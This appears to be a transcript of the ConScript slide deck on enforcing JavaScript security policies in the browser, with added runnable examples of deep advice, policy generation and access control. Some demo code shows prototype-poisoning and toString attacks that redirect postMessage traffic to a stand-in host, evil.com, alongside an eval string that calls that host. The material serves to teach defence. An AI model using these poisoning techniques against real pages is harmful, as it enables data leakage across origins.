ConScript Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser Leo Meyerovich UC Berkeley Benjamin Livshits Microsoft Research

Dec 31, 2015

Page 1: ConScript Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser Leo Meyerovich UC Berkeley Benjamin Livshits Microsoft.

ConScript: Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser

Leo Meyerovich, UC Berkeley

Benjamin Livshits, Microsoft Research

Page 2

Page 3: Complications

Benign but buggy:
• Who is to blame? Code is constantly evolving.
• How do we maintain quality?

Downright malicious:
• Prototype hijacking

Page 4: Developer's Dilemma

Page 5: Only Allow eval of JSON

eval('([{"hello": "Oakland"}, 2010])')      (a JSON literal: should be allowed)
eval("(xhr.open('evil.com');)")             (arbitrary code: should be rejected)

• Idea for a policy:
  – Parse input strings instead of running them
  – Use ConScript to advise eval calls
• AspectJ advice for Java looks like: void around call Window::eval (String s) { … }
• How to do advice in JavaScript?
  – No classes to speak of

Page 6: Advising Calls is Tricky

window.eval = function allowJSON() { … }

[Figure: heap and stack after the assignment above. The window object (fields document, window, x, y, z, frames[0]) now points at allowJSON, but the original function eval is still reachable: the frame object behind frames[0] has its own eval reference, and a stack frame still holds a reference to eval. Replacing one property does not mediate those other paths.]

ConScript approach:
– Deep advice for complete mediation
– Implemented within the browser for efficiency and reliability

Page 7: Example of Applying Advice in ConScript

<SCRIPT SRC="facebook.js" POLICY="
  var substr = String.prototype.substring;
  var parse = JSON.parse;
  around(window.eval,
    function(oldEval, str) {
      var str2 = uCall(str, substr, 1, str.length - 1);
      var res = parse(str2);
      if (res) return res;
      else throw 'eval only for JSON';
    });">

The policy in the POLICY attribute runs before facebook.js does, so it captures String.prototype.substring and JSON.parse before page code can tamper with them, calls substring through uCall so a poisoned prototype cannot intercept the call, and parses the text inside the outer parentheses instead of evaluating it. (As written, `if (res)` also rejects JSON values that are falsy, such as 0, false or null.)

Page 8: Contributions of ConScript

Page 9 (outline; current section: Implementation)

• A case for aspects in the browser
• Correctness checking
• Expressiveness
• Real-world evaluation

Page 10: Advising JavaScript Functions in IE8

around(paint, withBoundChecks);
dog.draw();
fish.display();

[Figure: heap and stack. The objects dog and fish hold references (draw and display) to the same function paint; the stack shows function withBoundChecks above function paint. Because around() attaches withBoundChecks to the function object paint rather than to one property, both dog.draw() and fish.display() run the advice.]

Page 11: This is Just the Beginning…

• Not just JavaScript functions
  – native JavaScript calls: Math.round, …
  – DOM calls: document.getElementById, …
• Not just functions…
  – script introduction
  – …
• Optimizations
  – Blessing
  – Auto-blessing

Page 12 (outline; current section: Correctness checking, type system)

• A case for aspects in the browser
• Correctness checking
• Expressiveness
• Real-world evaluation

Page 13: Policies are Easy to Get Wrong

var okOrigin = {"http://www.google.com": true};
around(window.postMessage, function (post, msg, target) {
  if (!okOrigin[target]) { throw 'err'; }
  else { return post.call(this, msg, target); }
});

Three ways page code can subvert this policy:
• toString redefinition! okOrigin[target] converts target to a string by calling its toString, so a non-string target whose toString returns an allowed origin passes the check and returns a different origin when postMessage converts it again.
• Function.prototype poisoning! post.call is looked up on Function.prototype, which the page can overwrite, so the policy ends up invoking attacker code.
• Object.prototype poisoning! okOrigin[target] walks the prototype chain, so defining Object.prototype["http://evil.com"] = true makes the lookup succeed for an origin that is not in the table.
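The three attacks above, run against the slide's policy and against a hardened version, as an added example that is not code from the ConScript paper or slides. fakePostMessage is a constructed stand-in for window.postMessage (like the browser, it stringifies its target); the hardened policy captures Object.prototype.hasOwnProperty and Reflect.apply at load time, which is the role ConScript's hasProp and uCall primitives play inside the interpreter.

```javascript
// Added example, not ConScript code: the naive policy from the slide, the
// three attacks the slide names, and a hardened version.

// Constructed stand-in for window.postMessage; records where a message went.
const delivered = [];
function fakePostMessage(msg, target) {
  delivered.push(String(target));          // the browser stringifies the target too
  return "sent";
}

// The policy as written on the slide.
const okOrigin = { "http://www.google.com": true };
function naivePolicy(post, msg, target) {
  if (!okOrigin[target]) { throw "err"; }
  else { return post.call(this, msg, target); }
}

// Hardened policy. Everything it relies on is captured when the policy loads,
// before page code runs (ConScript's POLICY attribute gives that ordering).
const hasOwn = Object.prototype.hasOwnProperty;
const apply = Reflect.apply;
function hardenedPolicy(post, msg, target) {
  if (typeof target !== "string") throw "err";           // no toString tricks
  if (!apply(hasOwn, okOrigin, [target])) throw "err";   // own property only
  return apply(post, this, [msg, target]);               // never touches Function.prototype.call
}

// Each attack poisons the environment (returning an undo function) and
// supplies the target it posts to.
const attacks = {
  // 1. toString redefinition: the allow-list lookup converts the target once,
  //    postMessage converts it again and gets a different answer.
  toStringRedefinition: {
    poison() { return () => {}; },
    target() {
      let n = 0;
      return { toString() { return ++n === 1 ? "http://www.google.com" : "http://evil.com"; } };
    },
  },
  // 2. Object.prototype poisoning: the lookup finds the key on the prototype chain.
  objectPrototypePoisoning: {
    poison() {
      Object.prototype["http://evil.com"] = true;
      return () => { delete Object.prototype["http://evil.com"]; };
    },
    target() { return "http://evil.com"; },
  },
  // 3. Function.prototype poisoning: post.call now runs attacker code that
  //    forwards the message to another origin.
  functionPrototypePoisoning: {
    poison() {
      const realCall = Function.prototype.call;
      Function.prototype.call = function (self, msg) {
        return Reflect.apply(this, self, [msg, "http://evil.com"]);
      };
      return () => { Function.prototype.call = realCall; };
    },
    target() { return "http://www.google.com"; },
  },
};

// Run one policy under one attack; return the origin the message reached,
// or "blocked" if the policy threw. Deliberately avoids .call(), which
// attack 3 poisons.
function attempt(policy, attack) {
  delivered.length = 0;
  const undo = attack.poison();
  try {
    policy(fakePostMessage, "hello", attack.target());
    return delivered[0];
  } catch (e) {
    return "blocked";
  } finally {
    undo();
  }
}

// Outcome table: attack name -> { naive, hardened }.
function compare() {
  const table = {};
  for (const name of Object.keys(attacks)) {
    table[name] = {
      naive: attempt(naivePolicy, attacks[name]),
      hardened: attempt(hardenedPolicy, attacks[name]),
    };
  }
  return table;
}
```

Under all three attacks the naive policy delivers the message to http://evil.com, while the hardened one blocks the first two and, for the third, still delivers to the allowed origin because it never consults the poisoned Function.prototype.call. The typeof check is the cheap way out of the toString problem; ConScript's toPrimitive primitive exists for policies that must accept objects.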

Page 14: How Do We Enforce Policy Correctness?

Application code:
• Unperturbed usage of legacy code
• Disallow arguments.caller to avoid stack inspection (disallowed by ES5's strict mode)

Policy code:
• Modify the JavaScript interpreter
  – introduce uCall, hasProp, and toPrimitive
  – disable eval
• Propose a type system to enforce correct use of these primitives
  – disable with, …

Page 15: Policy Type System

• ML-like type system
• Uses security labels to denote privilege levels
• Enforces access path integrity and reference isolation

Reference isolation
• o does not leak through poisoning if f is a field

Access path integrity for function calls
• o.f remains unpoisoned if T in v : T is not poisoned

Page 16 (outline; current section: Expressiveness, policies)

• A case for aspects in the browser
• Correctness checking
• Expressiveness
• Real-world evaluation

Page 17: ConScript Policies

• 17 hand-written policies
  – Diverse: based on literature, bugs, and anti-patterns
  – Short: wrote new HTML tags with only a few lines of code
• 2 automatic policy generators
  – Using runtime analysis
  – Using static analysis

Page 18: The paper presents 17 ConScript policies. One example, with the type system's security labels (K and U) on the parameters:

around(document.createElement, function (c : K, tag : U) {
  var elt : U = uCall(document, c, tag);
  if (elt.nodeName == "IFRAME") throw 'err';
  else return elt;
});

Page 19: Generating Intrusion Detection Policies

[Figure: a two-phase pipeline. ConScript instrumentation records the observed method calls (eval, new Function("string"), postMessage, XDomainRequest, XMLHttpRequest, …); ConScript enforcement then uses that record as the policy.]
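The pipeline on this slide in runnable form, as an added example rather than ConScript's own generator. makeApi builds a constructed stand-in for the browser entry points the slide lists, and around() replaces a property (shallow advice), which is enough to show the two phases even though ConScript advises functions inside the interpreter. It goes slightly beyond the slide by also recording the postMessage target origins seen during training.

```javascript
// Added example, not ConScript's generator: observe which sensitive calls a
// page makes, turn the record into an allow-list policy, then enforce it.

const SENSITIVE = ["eval", "Function", "postMessage", "XDomainRequest", "xmlHttpRequest"];

// Constructed stand-ins for the browser functions on the slide.
function makeApi() {
  return {
    eval: (src) => `evaluated ${src}`,
    Function: (src) => `compiled ${src}`,
    postMessage: (msg, target) => `posted to ${target}`,
    XDomainRequest: (url) => `xdr ${url}`,
    xmlHttpRequest: (url) => `xhr ${url}`,
  };
}

// Shallow advice by property replacement (ConScript does this in the engine).
function around(obj, name, advice) {
  const original = obj[name];
  obj[name] = function (...args) { return advice.call(this, original, ...args); };
}

// Phase 1, instrumentation: let every call through, but record which entry
// points the page used and, for postMessage, which target origins.
function instrument(api) {
  const observed = { calls: new Set(), postMessageTargets: new Set() };
  for (const name of SENSITIVE) {
    around(api, name, function (original, ...args) {
      observed.calls.add(name);
      if (name === "postMessage") observed.postMessageTargets.add(String(args[1]));
      return original.apply(this, args);
    });
  }
  return observed;
}

// Phase 2a, generation: the record becomes a serialisable allow-list policy.
function generatePolicy(observed) {
  return {
    allow: [...observed.calls].sort(),
    postMessageTargets: [...observed.postMessageTargets].sort(),
  };
}

// Phase 2b, enforcement: anything not seen during training is a violation.
function enforce(api, policy) {
  const allow = new Set(policy.allow);
  const targets = new Set(policy.postMessageTargets);
  for (const name of SENSITIVE) {
    around(api, name, function (original, ...args) {
      if (!allow.has(name)) throw new Error(`policy violation: ${name}`);
      if (name === "postMessage" && !targets.has(String(args[1]))) {
        throw new Error(`policy violation: postMessage to ${args[1]}`);
      }
      return original.apply(this, args);
    });
  }
}

// Constructed scenario: train on a page that only uses XHR and postMessage to
// one origin, then replay those calls plus two that were never observed.
function trainAndEnforce() {
  const training = makeApi();
  const observed = instrument(training);
  training.xmlHttpRequest("/feed.json");
  training.postMessage("hello", "http://www.google.com");
  const policy = generatePolicy(observed);

  const production = makeApi();
  enforce(production, policy);
  const outcomes = {};
  const replay = [
    ["xmlHttpRequest", ["/feed.json"]],
    ["postMessage", ["hello", "http://www.google.com"]],
    ["postMessage", ["hello", "http://evil.com"]],
    ["eval", ["alert(1)"]],
  ];
  for (const [name, args] of replay) {
    const key = `${name}(${args.join(", ")})`;
    try { outcomes[key] = production[name](...args); }
    catch (e) { outcomes[key] = e.message; }
  }
  return { policy, outcomes };
}
```

The generated policy is only as complete as the training run: a code path that was never exercised becomes a violation in production, which is the usual false-positive trade-off of anomaly-based intrusion detection.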

Page 20: Enforcing C# Access Modifiers

C#:
  class File {
    public File () { … }
    private open () { … }
    …

JavaScript (emitted by the Script# compiler):
  function File () { … }
  File.construct = …
  File.open = …
  …

ConScript (emitted by the policy generator from the same C# declarations):
  around(File, pubEntryPoint);
  around(File.construct, pubEntryPoint);
  around(File.open, privCall);

Public members become public entry points and private members are advised with privCall, so the access modifiers that the C# compiler checked statically are enforced at runtime in the generated JavaScript.
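One way to implement the pubEntryPoint and privCall advice named on this slide, as an added example that is neither Script# output nor ConScript's generator. It assumes (the slide does not say) that the policy tracks whether a public entry point of the class is currently executing, using a depth counter; the File class is a constructed stand-in for compiled output, and around() is property replacement rather than deep advice.

```javascript
// Added example, not Script# or ConScript code: dynamic enforcement of
// public/private with a per-class depth counter (an assumed design).

function around(obj, name, advice) {
  const original = obj[name];
  obj[name] = function (...args) { return advice.call(this, original, ...args); };
}

// Advice pair for one class. A private member may only run while some public
// entry point of the same class is on the stack.
function accessAdvice(className) {
  let depth = 0;
  return {
    pubEntryPoint(original, ...args) {
      depth++;
      try { return original.apply(this, args); } finally { depth--; }
    },
    privCall(original, ...args) {
      if (depth === 0) throw new Error(`private member of ${className} called from outside`);
      return original.apply(this, args);
    },
  };
}

// Constructed stand-in for compiled output of:
//   class File { public string Read(string p) {...} public void Each(...) {...}
//                private void Open(string p) {...} }
function File() { this.handle = null; }
File.prototype.read = function (path) { this.open(path); return `contents of ${path}`; };
File.prototype.each = function (cb) { cb(this); };
File.prototype.open = function (path) { this.handle = path; return "opened"; };

// What a policy generator would emit from the access modifiers.
const fileAccess = accessAdvice("File");
around(File.prototype, "read", fileAccess.pubEntryPoint);
around(File.prototype, "each", fileAccess.pubEntryPoint);
around(File.prototype, "open", fileAccess.privCall);

function demo() {
  const f = new File();
  const outcome = {};
  outcome.viaPublic = f.read("/etc/hosts");            // allowed: open() runs inside read()
  try { outcome.direct = f.open("/etc/shadow"); }       // blocked: no entry point on the stack
  catch (e) { outcome.direct = e.message; }
  // Caveat of a dynamic-extent check: a callback invoked from inside a public
  // method counts as "inside" the class, so it can reach private members.
  f.each((file) => { outcome.viaCallback = file.open("/etc/shadow"); });
  return outcome;
}
```

The last case is the check's known weak spot: any callback a public method hands control to inherits the class's privilege for the duration of the call, so a generator that wants stronger isolation has to distinguish calls made by the class's own code from calls made by code it merely invoked.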

Page 21 (outline; current section: Evaluation)

• A case for aspects in the browser
• Correctness checking
• Expressiveness
• Real-world evaluation

Page 22: Experimental Evaluation

Page 23: DoCoMo Policy Enforcement Overhead

[Bar chart: runtime overhead (0% to 80%) of ConScript versus DoCoMo (JavaScript rewriting) on Google Maps (183ms), MSN (439ms) and GMail (736ms). The three ConScript bars are labeled 7%, 1% and 0%; the three DoCoMo bars are labeled 30%, 73% and 63%.]

H. Kikuchi, D. Yu, A. Chander, H. Inamura, and I. Serikov, "JavaScript instrumentation in practice," 2008

Page 24: File Size Increase for Blacklisting Policy

[Bar chart: file size increase factor (1.0 to 13.0) per site and approach, bars read in legend order ConScript, DoCoMo, Caja, Sandbox.]

              MSN    GMail   Google Maps
ConScript     1.0    1.0     1.0
DoCoMo        1.7    1.5     1.5
Caja          4.8    3.9     4.4
Sandbox       1.2    10.4    1.5

Page 25: Conclusions

Page 26: QUESTIONS?

Page 27: Mediating DOM Functions (deep aspects)

[Figure: window.postMessage and frame2.postMessage both enter the JavaScript interpreter and resolve to the same native postMessage in the IE8 libraries (HTML, networking, …) at address 0xff34e5, here called with arguments "hello", "evil.com". Before dispatching into the library, the interpreter looks the function's address up in an advice dispatch table: after around(window.postMessage, …) the entry for 0xff34e5 holds the advice together with its on/off flag, and a function with no entry ([not found]) is called directly. Because the lookup is keyed on the native function rather than on a property, every alias of postMessage is mediated.]

Page 28: ConScript Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser Leo Meyerovich UC Berkeley Benjamin Livshits Microsoft.

function advice1 (foo2) { if (ok()) { foo2(); } else throw ‘exn’; }

function foo () { }

Resuming Calls

30

function advice2 (foo2) { if (ok()) { bless(); foo2(); } else throw ‘exn’; }

function foo () { }

advice onadvice off

bless() temporarily disables advice for next call

Page 29: Optimizing the Critical Path

function advice2 (foo2) { if (ok()) { bless(); foo2(); } else throw 'exn'; }
function foo () { }

(advice on when advice2 is entered; the explicit bless() turns it off for the resumed call)

function advice3 (foo2) { if (ok()) foo2(); else { curse(); throw 'exn'; } }
function foo () { }

(advice off as soon as advice3 is entered; curse() turns it back on before the throw)

• Calling advice turns advice off for the next call
• curse() enables advice for the next call
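A toy model of the dispatch described on the "Advising JavaScript Functions in IE8", "Mediating DOM Functions", "Resuming Calls" and "Optimizing the Critical Path" slides, as an added example that is not ConScript's implementation. All calls in the model go through invoke(), standing in for the interpreter's call path; the advice table is keyed by function identity, as the address-keyed table on the slide is; the auto-blessing rule and curse() follow the last slide; shallowAround is the property-replacement contrast from the earlier slides. The paint/withBoundChecks bodies are constructed.

```javascript
// Added example, not ConScript code: deep advice keyed on function identity,
// with auto-blessing and curse(), next to shallow advice for contrast.

// Shallow advice: wraps one property; other references to the function are missed.
function shallowAround(obj, name, advice) {
  const original = obj[name];
  obj[name] = function (...args) {
    return advice.call(this, () => original.apply(this, args), ...args);
  };
}

// Deep advice: function object -> { advice, off }. Models the interpreter's table.
const adviceTable = new WeakMap();
function around(fn, advice) { adviceTable.set(fn, { advice, off: false }); }
function curse(fn) { adviceTable.get(fn).off = false; }   // re-arm advice for the next call

// Models the interpreter's call path: consult the table before dispatching.
function invoke(fn, thisArg, ...args) {
  const entry = adviceTable.get(fn);
  if (!entry) return fn.apply(thisArg, args);      // [not found]: ordinary call
  if (entry.off) {                                  // blessed: this one call resumes fn
    entry.off = false;
    return fn.apply(thisArg, args);
  }
  entry.off = true;                                 // auto-bless: advice is off for the next call
  return entry.advice.call(thisArg, () => invoke(fn, thisArg, ...args), ...args);
}

// The function and advice from the IE8 slide (bodies constructed).
function paint(x) { return `painted at ${x}`; }
function withBoundChecks(resume, x) {
  if (x < 0 || x > 100) throw new Error("out of bounds");
  return resume();
}
// Same check, but re-arms advice on the error path, as advice3 on the slide does.
function withBoundChecksCursed(resume, x) {
  if (x < 0 || x > 100) { curse(paint); throw new Error("out of bounds"); }
  return resume();
}

function tryCall(f) { try { return f(); } catch (e) { return e.message; } }

// dog.draw and fish.display alias paint; shallow advice only sees the one it wrapped.
function shallowMissesAlias() {
  const dog = { draw: paint }, fish = { display: paint };
  shallowAround(dog, "draw", withBoundChecks);
  return [tryCall(() => dog.draw(500)), tryCall(() => fish.display(500))];
}

// Deep advice mediates every alias because dispatch is keyed on paint itself.
function deepMediatesAliases() {
  around(paint, withBoundChecksCursed);
  const dog = { draw: paint }, fish = { display: paint };
  return [tryCall(() => invoke(dog.draw, dog, 10)), tryCall(() => invoke(fish.display, fish, 500))];
}

// Two rejected calls in a row. Advice that throws without curse() leaves the
// function blessed, so the second call bypasses the check entirely.
function twoRejectedCalls(advice) {
  around(paint, advice);
  return [tryCall(() => invoke(paint, null, 500)), tryCall(() => invoke(paint, null, 500))];
}
```

The twoRejectedCalls case is the practitioner's caveat behind the last slide: once entering advice turns it off automatically, every path out of the advice that does not resume the call must curse(), or the next call to that function runs unmediated.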